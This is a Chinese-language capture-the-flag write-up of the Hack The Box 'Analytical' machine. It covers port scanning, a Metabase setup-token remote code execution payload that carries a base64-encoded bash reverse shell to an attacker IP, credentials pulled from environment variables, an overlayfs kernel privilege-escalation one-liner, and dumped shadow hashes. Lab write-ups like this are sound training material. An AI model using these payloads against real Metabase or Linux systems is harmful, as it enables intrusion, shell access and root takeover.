基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.233
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 15:45 CST
Nmap scan report for 10.10.11.233
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://analytical.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.75 seconds

80

需要加hosts:

1
10.10.11.233 analytical.htb

数据分析服务相关,右上角login得到子域名data:

data.analytical.htb

同样加hosts后访问,是一个Metabase:

Metabase

响应信息中可以得到Metabase版本信息:

搜索可以找到相关漏洞:

根据文章,利用过程分两部分,第一部分获取token,第二部分利用sql

token

通过文章中给出的接口获取setup-token:

1
249fa03d-fd94-4d5b-b94f-b4ebf3df681f

shell

第二步,使用得到的token来利用RCE,使用的payload根据文章和github中的结合而来:

1
2
3
4
$ echo "/bin/bash -i >&/dev/tcp/10.10.16.10/4444 0>&1" | base64
L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTAvNDQ0NCAwPiYxCg==

{"details": {"details": {"advanced-options": true, "classname": "org.h2.Driver", "subname": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTAvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}')\n$$--=x", "subprotocol": "h2"}, "engine": "postgres", "name": "x"}, "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f"}

打到容器内metabase:

信息

metabase容器内环境变量中得到一组账号密码:

1
2
META_USER=metalytics
META_PASS=An4lytics_ds20223#

user flag

得到的账号密码可以ssh登录宿主机:

提权信息

根据内核版本,搜到相关漏洞:

提权 & root flag

exp一键(某些其他老漏洞exp也能打,但应该是非预期,easy难度没那么麻烦):

1
2
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("chmod +s /bin/bash")'

shadow

1
2
root:$y$j9T$aVUkVU8LWFNEuXdwrOIJH.$jF8hy0vMzBJTvu/.HkzP0E4ZObo1I.frOPRVj2ktqM2:19576:0:99999:7:::
metalytics:$y$j9T$juJFLKOECgSAR5LiOX1Or.$LevBUAgKibrIsqHCjXhY2ND3inwq40NcwaK6pK/XFS1:19572:0:99999:7:::

参考资料